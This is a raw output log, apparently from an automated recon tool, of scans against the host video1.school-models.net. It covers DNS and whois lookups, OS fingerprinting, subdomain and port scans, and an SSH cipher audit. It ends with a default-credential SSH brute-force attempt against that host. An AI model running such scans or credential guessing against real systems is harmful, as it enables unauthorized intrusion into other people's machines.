2366. [*] A 45.mk 59.188.251.64
2367. [*] A 45.co.mk 87.76.31.211
2368. [*] A 45.ms 121.127.236.68
2369. [*] A 45.co.mobi 54.225.105.179
2370. [*] A 45.com.mx 185.53.178.9
2371. [*] A 45.biz.my 202.190.174.44
2372. [*] A 45.net 208.73.211.165
2373. [*] A 45.net 208.73.210.202
2374. [*] A 45.net 208.73.210.217
2375. [*] A 45.net 208.73.211.177
2376. [*] A 45.co.net 188.166.216.219
2377. [*] A 45.net.net 52.50.81.210
2378. [*] A 45.org.net 23.23.86.44
2379. [*] A 45.co.nl 37.97.184.204
2380. [*] A 45.nl 212.29.175.19
2381. [*] A 45.com.nl 83.98.157.102
2382. [*] A 45.net.nl 83.98.157.102
2383. [*] A 45.no 72.52.4.90
2384. [*] A 45.co.nr 208.100.40.202
2385. [*] A 45.nu 194.9.94.85
2386. [*] A 45.nu 194.9.94.86
2387. [*] A 45.com.nu 144.76.162.245
2388. [*] A 45.org.nu 80.92.84.139
2389. [*] CNAME 45.co.nu co.nu
2390. [*] A co.nu 144.76.162.245
2391. [*] A 45.nz 185.53.179.6
2392. [*] A 45.net.nu 199.102.76.78
2393. [*] A 45.co.nz 185.53.178.8
2394. [*] A 45.org 199.59.242.150
2395. [*] CNAME 45.net.org pewtrusts.org
2396. [*] A pewtrusts.org 204.74.99.100
2397. [*] A 45.com.org 23.23.86.44
2398. [*] A 45.ph 45.79.222.138
2399. [*] A 45.co.ph 45.79.222.138
2400. [*] A 45.com.ph 45.79.222.138
2401. [*] A 45.net.ph 45.79.222.138
2402. [*] A 45.org.ph 45.79.222.138
2403. [*] A 45.pl 94.152.8.9
2404. [*] A 45.pm 213.186.33.5
2405. [*] A 45.co.pl 212.91.6.55
2406. [*] A 45.org.pm 208.73.211.177
2407. [*] A 45.org.pm 208.73.210.202
2408. [*] A 45.org.pm 208.73.211.165
2409. [*] A 45.org.pm 208.73.210.217
2410. [*] A 45.co.ps 66.96.132.56
2411. [*] A 45.co.pt 194.107.127.52
2412. [*] A 45.pw 141.8.226.58
2413. [*] CNAME 45.biz.ps biz.ps
2414. [*] A biz.ps 144.76.162.245
2415. [*] A 45.co.pw 141.8.226.59
2416. [*] A 45.net.pw 141.8.226.59
2417. [*] A 45.biz.pw 141.8.226.59
2418. [*] A 45.org.pw 141.8.226.59
2419. [*] A 45.re 213.186.33.5
2420. [*] A 45.net.ro 69.64.52.127
2421. [*] CNAME 45.co.ro now.co.ro
2422. [*] A now.co.ro 185.27.255.9
2423. [*] A 45.org.re 217.70.184.38
2424. [*] A 45.ro 89.36.93.227
2425. [*] A 45.ru 195.226.222.22
2426. [*] A 45.ru 195.226.222.21
2427. [*] A 45.com.ru 178.210.89.119
2428. [*] A 45.se 72.52.4.90
2429. [*] A 45.biz.se 185.53.179.6
2430. [*] CNAME 45.net.se 773147.parkingcrew.net
2431. [*] A 773147.parkingcrew.net 185.53.179.29
2432. [*] A 45.sk 46.4.113.74
2433. [*] A 45.co.sl 91.195.240.135
2434. [*] A 45.com.sr 143.95.106.249
2435. [*] A 45.co.su 72.52.4.122
2436. [*] A 45.biz.st 91.121.28.115
2437. [*] A 45.su 91.195.240.135
2438. [*] A 45.biz.tc 64.136.20.39
2439. [*] A 45.tel 75.126.102.249
2440. [*] A 45.biz.tf 85.236.153.18
2441. [*] A 45.tk 195.20.45.204
2442. [*] A 45.co.tl 208.100.40.202
2443. [*] A 45.net.tf 188.40.70.29
2444. [*] A 45.net.tf 188.40.70.27
2445. [*] A 45.net.tf 188.40.117.12
2446. [*] A 45.tn 213.186.33.5
2447. [*] A 45.co.to 175.118.124.44
2448. [*] A 45.co.tv 31.186.25.163
2449. [*] A 45.biz.tv 72.52.4.122
2450. [*] A 45.org.tv 72.52.4.122
2451. [*] A 45.tt 58.64.137.93
2452. [*] A 45.net.ua 109.72.149.70
2453. [*] A 45.com.ua 171.25.204.81
2454. [*] A 45.org.ua 91.206.226.41
2455. [*] A 45.co.uk 87.106.142.81
2456. [*] CNAME 45.biz.uz biz.uz
2457. [*] A biz.uz 144.76.162.245
2458. [*] A 45.co.vg 88.198.29.97
2459. [*] A 45.com.vg 88.198.29.97
2460. [*] A 45.net.vg 68.178.254.180
2461. [*] A 45.biz.vg 89.31.143.20
2462. [*] A 45.org.uk 52.58.78.16
2463. [*] A 45.com.ws 202.4.48.211
2464. [*] A 45.ws 69.172.201.153
2465. [*] A 45.net.ws 202.4.48.211
2466. [*] A 45.biz.ws 184.168.221.104
2467. [*] A 45.org.ws 202.4.48.211
2468. [*] A 45.yt 153.120.157.112
2469. [*] A 45.vc 52.58.78.16
2470. [*] A 45.co.za 50.63.89.1
2471. % [whois.apnic.net]
2472. % Whois data copyright terms http://www.apnic.net/db/dbcopyright.html
2473.  
2474. % Information related to '45.123.190.0 - 45.123.190.255'
2475.  
2476. % Abuse contact for '45.123.190.0 - 45.123.190.255' is 'support@hosthongkong.net'
2477.  
2478. inetnum: 45.123.190.0 - 45.123.190.255
2479. netname: HostBaltic-LT
2480. descr: HostBaltic Lithuania
2481. country: LT
2482. admin-c: RPCL1-AP
2483. tech-c: RPCL1-AP
2484. status: ALLOCATED NON-PORTABLE
2485. mnt-by: MAINT-RPL-HK
2486. mnt-irt: IRT-RPL-HK
2487. changed: admin@hostbaltic.com 20151128
2488. source: APNIC
2489.  
2490. irt: IRT-RPL-HK
2491. address: RMP Protection Limited, 211 Poly Centre, 15 Yip Fung Street, Fanling, Hong Kong
2492. e-mail: support@hosthongkong.net
2493. abuse-mailbox: support@hosthongkong.net
2494. admin-c: RPCL1-AP
2495. tech-c: RPCL1-AP
2496. auth: # Filtered
2497. mnt-by: MAINT-RPL-HK
2498. changed: hm-changed@apnic.net 20131108
2499. source: APNIC
2500.  
2501. role: RMP Protection Company Limited administrator
2502. address: RMPP, 211 Poly Centre, Fanling
2503. country: HK
2504. phone: +852 2607 4483
2505. fax-no: +852 2607 4483
2506. e-mail: abuse@hosthongkong.net
2507. admin-c: RPCL1-AP
2508. tech-c: RPCL1-AP
2509. nic-hdl: RPCL1-AP
2510. mnt-by: MAINT-RPL-HK
2511. changed: hm-changed@apnic.net 20160226
2512. source: APNIC
2513.  
2514. % Information related to '45.123.190.0/24AS133398'
2515.  
2516. route: 45.123.190.0/24
2517. descr: route object for 45.123.190.0/24
2518. origin: AS133398
2519. mnt-by: MAINT-RPL-HK
2520. changed: admin@hostbaltic.com 20160526
2521. country: LT
2522. source: APNIC
2523.  
2524. % This query was served by the APNIC Whois Service version 1.88.15-37 (WHOIS-US4)
2525. + -- ----------------------------=[Running Nslookup]=------------------------ -- +
2526. Server: 192.168.1.254
2527. Address: 192.168.1.254#53
2528.  
2529. Non-authoritative answer:
2530. Name: video1.school-models.net
2531. Address: 45.123.190.187
2532.  
2533. video1.school-models.net has address 45.123.190.187
2534. + -- ----------------------------=[Checking OS Fingerprint]=----------------- -- +
2535.  
2536. Xprobe2 v.0.3 Copyright (c) 2002-2005 fyodor@o0o.nu, ofir@sys-security.com, meder@o0o.nu
2537.  
2538. [+] Target is video1.school-models.net
2539. [+] Loading modules.
2540. [+] Following modules are loaded:
2541. [x] [1] ping:icmp_ping - ICMP echo discovery module
2542. [x] [2] ping:tcp_ping - TCP-based ping discovery module
2543. [x] [3] ping:udp_ping - UDP-based ping discovery module
2544. [x] [4] infogather:ttl_calc - TCP and UDP based TTL distance calculation
2545. [x] [5] infogather:portscan - TCP and UDP PortScanner
2546. [x] [6] fingerprint:icmp_echo - ICMP Echo request fingerprinting module
2547. [x] [7] fingerprint:icmp_tstamp - ICMP Timestamp request fingerprinting module
2548. [x] [8] fingerprint:icmp_amask - ICMP Address mask request fingerprinting module
2549. [x] [9] fingerprint:icmp_port_unreach - ICMP port unreachable fingerprinting module
2550. [x] [10] fingerprint:tcp_hshake - TCP Handshake fingerprinting module
2551. [x] [11] fingerprint:tcp_rst - TCP RST fingerprinting module
2552. [x] [12] fingerprint:smb - SMB fingerprinting module
2553. [x] [13] fingerprint:snmp - SNMPv2c fingerprinting module
2554. [+] 13 modules registered
2555. [+] Initializing scan engine
2556. [+] Running scan engine
2557. [-] ping:tcp_ping module: no closed/open TCP ports known on 45.123.190.187. Module test failed
2558. [-] ping:udp_ping module: no closed/open UDP ports known on 45.123.190.187. Module test failed
2559. [-] No distance calculation. 45.123.190.187 appears to be dead or no ports known
2560. [+] Host: 45.123.190.187 is up (Guess probability: 50%)
2561. [+] Target: 45.123.190.187 is alive. Round-Trip Time: 0.49167 sec
2562. [+] Selected safe Round-Trip Time value is: 0.98335 sec
2563. [-] fingerprint:tcp_hshake Module execution aborted (no open TCP ports known)
2564. [-] fingerprint:smb need either TCP port 139 or 445 to run
2565. [-] fingerprint:snmp: need UDP port 161 open
2566. [+] Primary guess:
2567. [+] Host 45.123.190.187 Running OS: p�@�V (Guess probability: 100%)
2568. [+] Other guesses:
2569. [+] Host 45.123.190.187 Running OS: p�@�V (Guess probability: 100%)
2570. [+] Host 45.123.190.187 Running OS: p�@�V (Guess probability: 100%)
2571. [+] Host 45.123.190.187 Running OS: p�@�V (Guess probability: 100%)
2572. [+] Host 45.123.190.187 Running OS: p�@�V (Guess probability: 100%)
2573. [+] Host 45.123.190.187 Running OS: p�@�V (Guess probability: 100%)
2574. [+] Host 45.123.190.187 Running OS: p�@�V (Guess probability: 100%)
2575. [+] Host 45.123.190.187 Running OS: p�@�V (Guess probability: 100%)
2576. [+] Host 45.123.190.187 Running OS: p�@�V (Guess probability: 100%)
2577. [+] Host 45.123.190.187 Running OS: p�@�V (Guess probability: 100%)
2578. [+] Cleaning up scan engine
2579. [+] Modules deinitialized
2580. [+] Execution completed.
2581. + -- ----------------------------=[Gathering Whois Info]=-------------------- -- +
2582. No match for "VIDEO1.SCHOOL-MODELS.NET".
2583. >>> Last update of whois database: 2017-10-02T00:13:23Z <<<
2584.  
2585. NOTICE: The expiration date displayed in this record is the date the
2586. registrar's sponsorship of the domain name registration in the registry is
2587. currently set to expire. This date does not necessarily reflect the expiration
2588. date of the domain name registrant's agreement with the sponsoring
2589. registrar. Users may consult the sponsoring registrar's Whois database to
2590. view the registrar's reported date of expiration for this registration.
2591.  
2592. TERMS OF USE: You are not authorized to access or query our Whois
2593. database through the use of electronic processes that are high-volume and
2594. automated except as reasonably necessary to register domain names or
2595. modify existing registrations; the Data in VeriSign Global Registry
2596. Services' ("VeriSign") Whois database is provided by VeriSign for
2597. information purposes only, and to assist persons in obtaining information
2598. about or related to a domain name registration record. VeriSign does not
2599. guarantee its accuracy. By submitting a Whois query, you agree to abide
2600. by the following terms of use: You agree that you may use this Data only
2601. for lawful purposes and that under no circumstances will you use this Data
2602. to: (1) allow, enable, or otherwise support the transmission of mass
2603. unsolicited, commercial advertising or solicitations via e-mail, telephone,
2604. or facsimile; or (2) enable high volume, automated, electronic processes
2605. that apply to VeriSign (or its computer systems). The compilation,
2606. repackaging, dissemination or other use of this Data is expressly
2607. prohibited without the prior written consent of VeriSign. You agree not to
2608. use electronic processes that are automated and high-volume to access or
2609. query the Whois database except as reasonably necessary to register
2610. domain names or modify existing registrations. VeriSign reserves the right
2611. to restrict your access to the Whois database in its sole discretion to ensure
2612. operational stability. VeriSign may restrict or terminate your access to the
2613. Whois database for failure to abide by these terms of use. VeriSign
2614. reserves the right to modify these terms at any time.
2615.  
2616. The Registry database contains ONLY .COM, .NET, .EDU domains and
2617. Registrars.
2618. + -- ----------------------------=[Gathering OSINT Info]=-------------------- -- +
2619.  
2620. *******************************************************************
2621. * *
2622. * | |_| |__ ___ /\ /\__ _ _ ____ _____ ___| |_ ___ _ __ *
2623. * | __| '_ \ / _ \ / /_/ / _` | '__\ \ / / _ \/ __| __/ _ \ '__| *
2624. * | |_| | | | __/ / __ / (_| | | \ V / __/\__ \ || __/ | *
2625. * \__|_| |_|\___| \/ /_/ \__,_|_| \_/ \___||___/\__\___|_| *
2626. * *
2627. * TheHarvester Ver. 2.7 *
2628. * Coded by Christian Martorella *
2629. * Edge-Security Research *
2630. * cmartorella@edge-security.com *
2631. *******************************************************************
2632.  
2633.  
2634. [-] Searching in Bing:
2635. Searching 50 results...
2636. Searching 100 results...
2637.  
2638.  
2639. [+] Emails found:
2640. ------------------
2641. No emails found
2642.  
2643. [+] Hosts found in search engines:
2644. ------------------------------------
2645. No hosts found
2646. + -- ----------------------------=[Gathering DNS Info]=---------------------- -- +
2647.  
2648. ; <<>> DiG 9.10.3-P4-Debian <<>> -x video1.school-models.net
2649. ;; global options: +cmd
2650. ;; Got answer:
2651. ;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 36420
2652. ;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1
2653.  
2654. ;; OPT PSEUDOSECTION:
2655. ; EDNS: version: 0, flags:; udp: 4096
2656. ;; QUESTION SECTION:
2657. ;net.school-models.video1.in-addr.arpa. IN PTR
2658.  
2659. ;; AUTHORITY SECTION:
2660. in-addr.arpa. 3600 IN SOA b.in-addr-servers.arpa. nstld.iana.org. 2017043206 1800 900 604800 3600
2661.  
2662. ;; Query time: 163 msec
2663. ;; SERVER: 192.168.1.254#53(192.168.1.254)
2664. ;; WHEN: Sun Oct 01 20:13:47 EDT 2017
2665. ;; MSG SIZE rcvd: 134
2666.  
2667. Smartmatch is experimental at /usr/bin/dnsenum line 698.
2668. Smartmatch is experimental at /usr/bin/dnsenum line 698.
2669. dnsenum VERSION:1.2.4
2670.  
2671. ----- video1.school-models.net -----
2672.  
2673.  
2674. Host's addresses:
2675. __________________
2676.  
2677. video1.school-models.net. 280 IN A 45.123.190.187
2678.  
2679.  
2680. Name Servers:
2681. ______________
2682.  
2683. video1.school-models.net NS record query failed: NOERROR
2684. + -- ----------------------------=[Gathering DNS Subdomains]=---------------- -- +
2685.  
2686. ____ _ _ _ _ _____
2687. / ___| _ _| |__ | (_)___| |_|___ / _ __
2688. \___ \| | | | '_ \| | / __| __| |_ \| '__|
2689. ___) | |_| | |_) | | \__ \ |_ ___) | |
2690. |____/ \__,_|_.__/|_|_|___/\__|____/|_|
2691.  
2692. # Coded By Ahmed Aboul-Ela - @aboul3la
2693.  
2694. [-] Enumerating subdomains now for video1.school-models.net
2695. [-] verbosity is enabled, will show the subdomains results in realtime
2696. [-] Searching now in Baidu..
2697. [-] Searching now in Yahoo..
2698. [-] Searching now in Google..
2699. [-] Searching now in Bing..
2700. [-] Searching now in Ask..
2701. [-] Searching now in Netcraft..
2702. [-] Searching now in DNSdumpster..
2703. [-] Searching now in Virustotal..
2704. [-] Searching now in ThreatCrowd..
2705. [-] Searching now in SSL Certificates..
2706. [-] Searching now in PassiveDNS..
2707.  
2708. ╔═╗╦═╗╔╦╗╔═╗╦ ╦
2709. ║ ╠╦╝ ║ ╚═╗╠═╣
2710. ╚═╝╩╚═ ╩o╚═╝╩ ╩
2711. + -- ----------------------------=[Gathering Certificate Subdomains]=-------- -- +
2712.  
2713. [+] Domains saved to: /usr/share/sniper/loot/domains/domains-video1.school-models.net-full.txt
2714.  
2715. + -- ----------------------------=[Checking for Sub-Domain Hijacking]=------- -- +
2716. + -- ----------------------------=[Checking Email Security]=----------------- -- +
2717.  
2718. + -- ----------------------------=[Pinging host]=---------------------------- -- +
2719. PING video1.school-models.net (45.123.190.187) 56(84) bytes of data.
2720. 64 bytes from 45.123.190.187 (45.123.190.187): icmp_seq=1 ttl=54 time=197 ms
2721.  
2722. --- video1.school-models.net ping statistics ---
2723. 1 packets transmitted, 1 received, 0% packet loss, time 0ms
2724. rtt min/avg/max/mdev = 197.766/197.766/197.766/0.000 ms
2725.  
2726. + -- ----------------------------=[Running TCP port scan]=------------------- -- +
2727.  
2728. Starting Nmap 7.60 ( https://nmap.org ) at 2017-10-01 20:14 EDT
2729. Warning: 45.123.190.187 giving up on port because retransmission cap hit (2).
2730. Nmap scan report for video1.school-models.net (45.123.190.187)
2731. Host is up (0.20s latency).
2732. Not shown: 391 closed ports, 80 filtered ports
2733. Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
2734. PORT STATE SERVICE
2735. 22/tcp open ssh
2736. 80/tcp open http
2737.  
2738. Nmap done: 1 IP address (1 host up) scanned in 18.12 seconds
2739.  
2740. + -- ----------------------------=[Running Intrusive Scans]=----------------- -- +
2741. + -- --=[Port 21 closed... skipping.
2742. + -- --=[Port 22 opened... running tests...
2743. # general
2744. (gen) banner: SSH-2.0-OpenSSH_5.3
2745. (gen) software: OpenSSH 5.3
2746. (gen) compatibility: OpenSSH 5.9-6.6, Dropbear SSH 2013.56+ (some functionality from 0.52)
2747. (gen) compression: enabled (zlib@openssh.com)
2748.  
2749. # key exchange algorithms
2750. (kex) diffie-hellman-group-exchange-sha256 -- [warn] using custom size modulus (possibly weak)
2751. `- [info] available since OpenSSH 4.4
2752. (kex) diffie-hellman-group-exchange-sha1 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
2753. `- [warn] using weak hashing algorithm
2754. `- [info] available since OpenSSH 2.3.0
2755. (kex) diffie-hellman-group14-sha1 -- [warn] using weak hashing algorithm
2756. `- [info] available since OpenSSH 3.9, Dropbear SSH 0.53
2757. (kex) diffie-hellman-group1-sha1 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
2758. `- [fail] disabled (in client) since OpenSSH 7.0, logjam attack
2759. `- [warn] using small 1024-bit modulus
2760. `- [warn] using weak hashing algorithm
2761. `- [info] available since OpenSSH 2.3.0, Dropbear SSH 0.28
2762.  
2763. # host-key algorithms
2764. (key) ssh-rsa -- [info] available since OpenSSH 2.5.0, Dropbear SSH 0.28
2765. (key) ssh-dss -- [fail] removed (in server) and disabled (in client) since OpenSSH 7.0, weak algorithm
2766. `- [warn] using small 1024-bit modulus
2767. `- [warn] using weak random number generator could reveal the key
2768. `- [info] available since OpenSSH 2.1.0, Dropbear SSH 0.28
2769.  
2770. # encryption algorithms (ciphers)
2771. (enc) aes128-ctr -- [info] available since OpenSSH 3.7, Dropbear SSH 0.52
2772. (enc) aes192-ctr -- [info] available since OpenSSH 3.7
2773. (enc) aes256-ctr -- [info] available since OpenSSH 3.7, Dropbear SSH 0.52
2774. (enc) arcfour256 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
2775. `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
2776. `- [warn] using weak cipher
2777. `- [info] available since OpenSSH 4.2
2778. (enc) arcfour128 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
2779. `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
2780. `- [warn] using weak cipher
2781. `- [info] available since OpenSSH 4.2
2782. (enc) aes128-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
2783. `- [warn] using weak cipher mode
2784. `- [info] available since OpenSSH 2.3.0, Dropbear SSH 0.28
2785. (enc) 3des-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
2786. `- [warn] using weak cipher
2787. `- [warn] using weak cipher mode
2788. `- [warn] using small 64-bit block size
2789. `- [info] available since OpenSSH 1.2.2, Dropbear SSH 0.28
2790. (enc) blowfish-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
2791. `- [fail] disabled since Dropbear SSH 0.53
2792. `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
2793. `- [warn] using weak cipher mode
2794. `- [warn] using small 64-bit block size
2795. `- [info] available since OpenSSH 1.2.2, Dropbear SSH 0.28
2796. (enc) cast128-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
2797. `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
2798. `- [warn] using weak cipher mode
2799. `- [warn] using small 64-bit block size
2800. `- [info] available since OpenSSH 2.1.0
2801. (enc) aes192-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
2802. `- [warn] using weak cipher mode
2803. `- [info] available since OpenSSH 2.3.0
2804. (enc) aes256-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
2805. `- [warn] using weak cipher mode
2806. `- [info] available since OpenSSH 2.3.0, Dropbear SSH 0.47
2807. (enc) arcfour -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
2808. `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
2809. `- [warn] using weak cipher
2810. `- [info] available since OpenSSH 2.1.0
2811. (enc) rijndael-cbc@lysator.liu.se -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
2812. `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
2813. `- [warn] using weak cipher mode
2814. `- [info] available since OpenSSH 2.3.0
2815.  
2816. # message authentication code algorithms
2817. (mac) hmac-md5 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
2818. `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
2819. `- [warn] using encrypt-and-MAC mode
2820. `- [warn] using weak hashing algorithm
2821. `- [info] available since OpenSSH 2.1.0, Dropbear SSH 0.28
2822. (mac) hmac-sha1 -- [warn] using encrypt-and-MAC mode
2823. `- [warn] using weak hashing algorithm
2824. `- [info] available since OpenSSH 2.1.0, Dropbear SSH 0.28
2825. (mac) umac-64@openssh.com -- [warn] using encrypt-and-MAC mode
2826. `- [warn] using small 64-bit tag size
2827. `- [info] available since OpenSSH 4.7
2828. (mac) hmac-sha2-256 -- [warn] using encrypt-and-MAC mode
2829. `- [info] available since OpenSSH 5.9, Dropbear SSH 2013.56
2830. (mac) hmac-sha2-512 -- [warn] using encrypt-and-MAC mode
2831. `- [info] available since OpenSSH 5.9, Dropbear SSH 2013.56
2832. (mac) hmac-ripemd160 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
2833. `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
2834. `- [warn] using encrypt-and-MAC mode
2835. `- [info] available since OpenSSH 2.5.0
2836. (mac) hmac-ripemd160@openssh.com -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
2837. `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
2838. `- [warn] using encrypt-and-MAC mode
2839. `- [info] available since OpenSSH 2.1.0
2840. (mac) hmac-sha1-96 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
2841. `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
2842. `- [warn] using encrypt-and-MAC mode
2843. `- [warn] using weak hashing algorithm
2844. `- [info] available since OpenSSH 2.5.0, Dropbear SSH 0.47
2845. (mac) hmac-md5-96 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
2846. `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
2847. `- [warn] using encrypt-and-MAC mode
2848. `- [warn] using weak hashing algorithm
2849. `- [info] available since OpenSSH 2.5.0
2850.  
2851. # algorithm recommendations (for OpenSSH 5.3)
2852. (rec) -diffie-hellman-group14-sha1 -- kex algorithm to remove
2853. (rec) -diffie-hellman-group1-sha1 -- kex algorithm to remove
2854. (rec) -diffie-hellman-group-exchange-sha1 -- kex algorithm to remove
2855. (rec) -ssh-dss -- key algorithm to remove
2856. (rec) -arcfour -- enc algorithm to remove
2857. (rec) -rijndael-cbc@lysator.liu.se -- enc algorithm to remove
2858. (rec) -blowfish-cbc -- enc algorithm to remove
2859. (rec) -3des-cbc -- enc algorithm to remove
2860. (rec) -aes256-cbc -- enc algorithm to remove
2861. (rec) -arcfour256 -- enc algorithm to remove
2862. (rec) -cast128-cbc -- enc algorithm to remove
2863. (rec) -aes192-cbc -- enc algorithm to remove
2864. (rec) -arcfour128 -- enc algorithm to remove
2865. (rec) -aes128-cbc -- enc algorithm to remove
2866. (rec) -hmac-md5-96 -- mac algorithm to remove
2867. (rec) -hmac-ripemd160 -- mac algorithm to remove
2868. (rec) -hmac-sha1-96 -- mac algorithm to remove
2869. (rec) -umac-64@openssh.com -- mac algorithm to remove
2870. (rec) -hmac-md5 -- mac algorithm to remove
2871. (rec) -hmac-ripemd160@openssh.com -- mac algorithm to remove
2872. (rec) -hmac-sha1 -- mac algorithm to remove
2873.  
2874.  
2875. Starting Nmap 7.60 ( https://nmap.org ) at 2017-10-01 20:14 EDT
2876. NSE: [ssh-run] Failed to specify credentials and command to run.
2877. NSE: [ssh-brute] Trying username/password pair: root:root
2878. NSE: [ssh-brute] Trying username/password pair: admin:admin
2879. NSE: [ssh-brute] Trying username/password pair: administrator:administrator
2880. NSE: [ssh-brute] Trying username/password pair: webadmin:webadmin
2881. NSE: [ssh-brute] Trying username/password pair: sysadmin:sysadmin
2882. NSE: [ssh-brute] Trying username/password pair: netadmin:netadmin
2883. NSE: [ssh-brute] Trying username/password pair: guest:guest
2884. NSE: [ssh-brute] Trying username/password pair: user:user
2885. NSE: [ssh-brute] Trying username/password pair: web:web
2886. NSE: [ssh-brute] Trying username/password pair: test:test
2887. NSE: [ssh-brute] Trying username/password pair: root:
2888. NSE: [ssh-brute] Trying username/password pair: admin:
2889. NSE: [ssh-brute] Trying username/password pair: administrator:
2890. NSE: [ssh-brute] Trying username/password pair: webadmin:
2891. NSE: [ssh-brute] Trying username/password pair: sysadmin:
2892. NSE: [ssh-brute] Trying username/password pair: netadmin:
2893. NSE: [ssh-brute] Trying username/password pair: guest:
2894. NSE: [ssh-brute] Trying username/password pair: user:
2895. NSE: [ssh-brute] Trying username/password pair: web:
2896. NSE: [ssh-brute] Trying username/password pair: test:
2897. NSE: [ssh-brute] Trying username/password pair: root:123456
2898. NSE: [ssh-brute] Trying username/password pair: admin:123456
2899. NSE: [ssh-brute] Trying username/password pair: administrator:123456
2900. NSE: [ssh-brute] Trying username/password pair: webadmin:123456
2901. NSE: [ssh-brute] Trying username/password pair: sysadmin:123456
2902. NSE: [ssh-brute] Trying username/password pair: netadmin:123456
2903. NSE: [ssh-brute] Trying username/password pair: guest:123456
2904. NSE: [ssh-brute] Trying username/password pair: user:123456
2905. NSE: [ssh-brute] Trying username/password pair: web:123456
2906. NSE: [ssh-brute] Trying username/password pair: test:123456
2907. NSE: [ssh-brute] Trying username/password pair: root:12345
2908. NSE: [ssh-brute] Trying username/password pair: admin:12345
2909. NSE: [ssh-brute] Trying username/password pair: administrator:12345
2910. NSE: [ssh-brute] Trying username/password pair: webadmin:12345
2911. NSE: [ssh-brute] Trying username/password pair: sysadmin:12345
2912. NSE: [ssh-brute] Trying username/password pair: netadmin:12345
2913. NSE: [ssh-brute] Trying username/password pair: guest:12345
2914. NSE: [ssh-brute] Trying username/password pair: user:12345
2915. NSE: [ssh-brute] Trying username/password pair: web:12345
2916. NSE: [ssh-brute] Trying username/password pair: test:12345
2917. NSE: [ssh-brute] Trying username/password pair: root:123456789
2918. NSE: [ssh-brute] Trying username/password pair: admin:123456789
2919. NSE: [ssh-brute] Trying username/password pair: administrator:123456789
2920. NSE: [ssh-brute] Trying username/password pair: webadmin:123456789
2921. NSE: [ssh-brute] Trying username/password pair: sysadmin:123456789
2922. NSE: [ssh-brute] Trying username/password pair: netadmin:123456789
2923. NSE: [ssh-brute] Trying username/password pair: guest:123456789
2924. NSE: [ssh-brute] Trying username/password pair: user:123456789
2925. NSE: [ssh-brute] Trying username/password pair: web:123456789
2926. NSE: [ssh-brute] Trying username/password pair: test:123456789
2927. NSE: [ssh-brute] Trying username/password pair: root:password
2928. NSE: [ssh-brute] Trying username/password pair: admin:password
2929. NSE: [ssh-brute] Trying username/password pair: administrator:password
2930. NSE: [ssh-brute] Trying username/password pair: webadmin:password
2931. NSE: [ssh-brute] Trying username/password pair: sysadmin:password
2932. NSE: [ssh-brute] Trying username/password pair: netadmin:password
2933. NSE: [ssh-brute] Trying username/password pair: guest:password
2934. NSE: [ssh-brute] Trying username/password pair: user:password
2935. NSE: [ssh-brute] Trying username/password pair: web:password
2936. NSE: [ssh-brute] Trying username/password pair: test:password
2937. NSE: [ssh-brute] Trying username/password pair: root:iloveyou
2938. NSE: [ssh-brute] Trying username/password pair: admin:iloveyou
2939. NSE: [ssh-brute] Trying username/password pair: administrator:iloveyou
2940. NSE: [ssh-brute] Trying username/password pair: webadmin:iloveyou
2941. NSE: [ssh-brute] Trying username/password pair: sysadmin:iloveyou
2942. NSE: [ssh-brute] Trying username/password pair: netadmin:iloveyou
2943. NSE: [ssh-brute] Trying username/password pair: guest:iloveyou
2944. NSE: [ssh-brute] Trying username/password pair: user:iloveyou
2945. NSE: [ssh-brute] Trying username/password pair: web:iloveyou
2946. NSE: [ssh-brute] Trying username/password pair: test:iloveyou
2947. NSE: [ssh-brute] Trying username/password pair: root:princess
2948. NSE: [ssh-brute] Trying username/password pair: admin:princess
2949. NSE: [ssh-brute] Trying username/password pair: administrator:princess
2950. NSE: [ssh-brute] Trying username/password pair: webadmin:princess
2951. NSE: [ssh-brute] Trying username/password pair: sysadmin:princess
2952. NSE: [ssh-brute] Trying username/password pair: netadmin:princess
2953. NSE: [ssh-brute] Trying username/password pair: guest:princess
2954. NSE: [ssh-brute] Trying username/password pair: user:princess
2955. NSE: [ssh-brute] Trying username/password pair: web:princess
2956. NSE: [ssh-brute] Trying username/password pair: test:princess
2957. NSE: [ssh-brute] Trying username/password pair: root:12345678
2958. NSE: [ssh-brute] Trying username/password pair: admin:12345678
2959. NSE: [ssh-brute] Trying username/password pair: administrator:12345678
2960. NSE: [ssh-brute] Trying username/password pair: webadmin:12345678
2961. NSE: [ssh-brute] Trying username/password pair: sysadmin:12345678
2962. NSE: [ssh-brute] Trying username/password pair: netadmin:12345678
2963. NSE: [ssh-brute] Trying username/password pair: guest:12345678
2964. NSE: [ssh-brute] Trying username/password pair: user:12345678
2965. NSE: [ssh-brute] Trying username/password pair: web:12345678
2966. NSE: [ssh-brute] Trying username/password pair: test:12345678
